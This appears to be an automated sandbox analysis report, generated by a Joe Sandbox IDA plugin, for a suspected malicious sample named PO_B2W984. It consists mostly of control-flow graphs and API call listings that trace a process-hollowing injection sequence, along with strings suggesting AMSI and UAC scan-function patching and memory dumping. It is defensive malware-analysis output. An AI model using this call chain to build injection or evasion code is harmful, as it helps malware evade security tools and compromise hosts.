12 API calls 29292->29293 29294 2de7d2a 29293->29294 29295 2dd4798 11 API calls 29294->29295 29296 2de7d3a 29295->29296 29315 2de8018 29296->29315 29299 2de80c0 15 API calls 29300 2de7d53 NtWriteVirtualMemory 29299->29300 29301 2de7d7f 29300->29301 29302 2dd44d0 11 API calls 29301->29302 29303 2de7d8c FreeLibrary 29302->29303 29303->26261 29305 2de791d 29304->29305 29306 2dd4b78 11 API calls 29305->29306 29308 2de792d 29306->29308 29307 2de7999 29307->29284 29308->29307 29314 2ddba3c CharNextA 29308->29314 29312 2dd44d6 29310->29312 29311 2dd44fc 29311->29243 29312->29311 29313 2dd2c2c 11 API calls 29312->29313 29313->29312 29314->29308 29316 2dd4500 11 API calls 29315->29316 29317 2de803b 29316->29317 29318 2de790c 12 API calls 29317->29318 29319 2de8048 29318->29319 29320 2de8050 GetModuleHandleA 29319->29320 29321 2de80c0 15 API calls 29320->29321 29322 2de8061 GetModuleHandleA 29321->29322 29323 2de807f 29322->29323 29324 2dd44ac 11 API calls 29323->29324 29325 2de7d4d 29324->29325 29325->29299 29327 2dd4950 GetModuleHandleA 29326->29327 29327->29269 29328 2dd4e88 29329 2dd4e95 29328->29329 29332 2dd4e9c 29328->29332 29337 2dd4bdc SysAllocStringLen 29329->29337 29334 2dd4bfc 29332->29334 29335 2dd4c08 29334->29335 29336 2dd4c02 SysFreeString 29334->29336 29336->29335 29337->29332

                                                                                                                                        Executed Functions

                                                                                                                                        Function 02DE8BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 6797 2de8ba8-2de8bab 6798 2de8bb0-2de8bb5 6797->6798 6798->6798 6799 2de8bb7-2de8c9e call 2dd493c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 6798->6799 6830 2dea6ef-2dea759 call 2dd44d0 * 2 call 2dd4c0c call 2dd44d0 call 2dd44ac call 2dd44d0 * 2 6799->6830 6831 2de8ca4-2de8d7f call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 6799->6831 6831->6830 6875 2de8d85-2de90ad call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd30d4 * 2 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd4d8c call 2dd4d9c call 2de85d4 6831->6875 6984 2de90af-2de911b call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 6875->6984 6985 2de9120-2de9441 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd2ee0 call 2dd2f08 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c GetThreadContext 6875->6985 6984->6985 6985->6830 7093 2de9447-2de96aa call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de824c 6985->7093 7166 2de99b7-2de9a23 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7093->7166 7167 2de96b0-2de9819 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de84bc 7093->7167 7194 2de9a28-2de9ba8 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de79ac 7166->7194 7257 2de981b-2de9841 call 2de79ac 7167->7257 7258 2de9843-2de98af call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7167->7258 7194->6830 7298 2de9bae-2de9ca7 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de8ab8 7194->7298 7266 2de98b4-2de99ab call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de79ac 7257->7266 7258->7266 7337 2de99b0-2de99b5 7266->7337 7349 2de9cfb-2dea453 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de7cf8 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de7cf8 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c SetThreadContext NtResumeThread call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd2c2c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de8798 * 3 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7298->7349 7350 2de9ca9-2de9cf6 call 2de89b0 call 2de89a4 7298->7350 7337->7194 7575 2dea458-2dea6ea call 2de8798 * 2 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 * 5 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2de7ecc call 2de8798 * 2 7349->7575 7350->7349 7575->6830
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                          • Part of subcall function 02DE85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DE8660
                                                                                                                                        • GetThreadContext.KERNEL32(00000844,02E31420,ScanString,02E313A4,02DEA774,UacInitialize,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,UacInitialize,02E313A4), ref: 02DE943A
                                                                                                                                          • Part of subcall function 02DE824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
                                                                                                                                          • Part of subcall function 02DE84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
                                                                                                                                          • Part of subcall function 02DE79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
                                                                                                                                          • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        • SetThreadContext.KERNEL32(00000844,02E31420,ScanBuffer,02E313A4,02DEA774,ScanString,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,00000840,00399FF8,02E314F8,00000004,02E314FC), ref: 02DEA14F
                                                                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000844,00000000,00000844,02E31420,ScanBuffer,02E313A4,02DEA774,ScanString,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,00000840,00399FF8,02E314F8), ref: 02DEA15C
                                                                                                                                          • Part of subcall function 02DE8798: LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                          • Part of subcall function 02DE8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                          • Part of subcall function 02DE8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 4083799063-51457883
                                                                                                                                        • Opcode ID: 1787fc41c0630f3706d654ce9e8c69d369d4fdbf2911c728722972445c4a7df8
                                                                                                                                        • Instruction ID: 79347744aca62a3f0e340a647741a63fc61b250bf34e5103238ec75174a61192
                                                                                                                                        • Opcode Fuzzy Hash: 1787fc41c0630f3706d654ce9e8c69d369d4fdbf2911c728722972445c4a7df8
                                                                                                                                        • Instruction Fuzzy Hash: F8E22E35A409599FDF11FBA4DC91ADE73BAEF44311F1181A5E00AAB314DE30EE868F64
                                                                                                                                        Function 02DE8BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 7653 2de8ba6-2de8bab 7655 2de8bb0-2de8bb5 7653->7655 7655->7655 7656 2de8bb7-2de8c9e call 2dd493c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7655->7656 7687 2dea6ef-2dea759 call 2dd44d0 * 2 call 2dd4c0c call 2dd44d0 call 2dd44ac call 2dd44d0 * 2 7656->7687 7688 2de8ca4-2de8d7f call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7656->7688 7688->7687 7732 2de8d85-2de90ad call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd30d4 * 2 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd4d8c call 2dd4d9c call 2de85d4 7688->7732 7841 2de90af-2de911b call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7732->7841 7842 2de9120-2de9441 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd2ee0 call 2dd2f08 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c GetThreadContext 7732->7842 7841->7842 7842->7687 7950 2de9447-2de96aa call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de824c 7842->7950 8023 2de99b7-2de9a23 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 7950->8023 8024 2de96b0-2de9819 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de84bc 7950->8024 8051 2de9a28-2de9ba8 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de79ac 8023->8051 8114 2de981b-2de9841 call 2de79ac 8024->8114 8115 2de9843-2de98af call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 8024->8115 8051->7687 8155 2de9bae-2de9ca7 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de8ab8 8051->8155 8123 2de98b4-2de99b5 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de79ac 8114->8123 8115->8123 8123->8051 8206 2de9cfb-2dea6ea call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de7cf8 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de7cf8 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c SetThreadContext NtResumeThread call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd2c2c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de8798 * 3 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de8798 * 2 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 * 5 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2de7ecc call 2de8798 * 2 8155->8206 8207 2de9ca9-2de9cf6 call 2de89b0 call 2de89a4 8155->8207 8206->7687 8207->8206
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                          • Part of subcall function 02DE85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DE8660
                                                                                                                                        • GetThreadContext.KERNEL32(00000844,02E31420,ScanString,02E313A4,02DEA774,UacInitialize,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,UacInitialize,02E313A4), ref: 02DE943A
                                                                                                                                          • Part of subcall function 02DE824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
                                                                                                                                          • Part of subcall function 02DE84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
                                                                                                                                          • Part of subcall function 02DE79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 2852987580-51457883
                                                                                                                                        • Opcode ID: 171e90f856324784d8ead397d8089afb2649fb77b19e848d0faf490e85122138
                                                                                                                                        • Instruction ID: 104846704a0ac4325a7767e5d2c0910c8d47b627006745e35a952cf24756babc
                                                                                                                                        • Opcode Fuzzy Hash: 171e90f856324784d8ead397d8089afb2649fb77b19e848d0faf490e85122138
                                                                                                                                        • Instruction Fuzzy Hash: 70E22E35A409599FDF11FBA4DC91ADE73BAEF44311F1181A5E00AAB314DE30EE868F64
                                                                                                                                        Function 02DD5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8510 2dd5a78-2dd5ab9 GetModuleFileNameA RegOpenKeyExA 8511 2dd5afb-2dd5b3e call 2dd58b4 RegQueryValueExA 8510->8511 8512 2dd5abb-2dd5ad7 RegOpenKeyExA 8510->8512 8517 2dd5b40-2dd5b5c RegQueryValueExA 8511->8517 8518 2dd5b62-2dd5b7c RegCloseKey 8511->8518 8512->8511 8513 2dd5ad9-2dd5af5 RegOpenKeyExA 8512->8513 8513->8511 8515 2dd5b84-2dd5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8515 8519 2dd5c9e-2dd5ca5 8515->8519 8520 2dd5bbb-2dd5bbf 8515->8520 8517->8518 8521 2dd5b5e 8517->8521 8523 2dd5bcb-2dd5be1 lstrlenA 8520->8523 8524 2dd5bc1-2dd5bc5 8520->8524 8521->8518 8525 2dd5be4-2dd5be7 8523->8525 8524->8519 8524->8523 8526 2dd5be9-2dd5bf1 8525->8526 8527 2dd5bf3-2dd5bfb 8525->8527 8526->8527 8528 2dd5be3 8526->8528 8527->8519 8529 2dd5c01-2dd5c06 8527->8529 8528->8525 8530 2dd5c08-2dd5c2e lstrcpynA LoadLibraryExA 8529->8530 8531 2dd5c30-2dd5c32 8529->8531 8530->8531 8531->8519 8532 2dd5c34-2dd5c38 8531->8532 8532->8519 8533 2dd5c3a-2dd5c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8519 8534 2dd5c6c-2dd5c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8519
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5A94
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AB2
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AD0
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DD5AEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DD5B37
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,02DD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001), ref: 02DD5B55
                                                                                                                                        • RegCloseKey.ADVAPI32(?,02DD5B84,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DD5B77
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DD5B94
                                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DD5BA1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DD5BA7
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DD5BD2
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C19
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C29
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C51
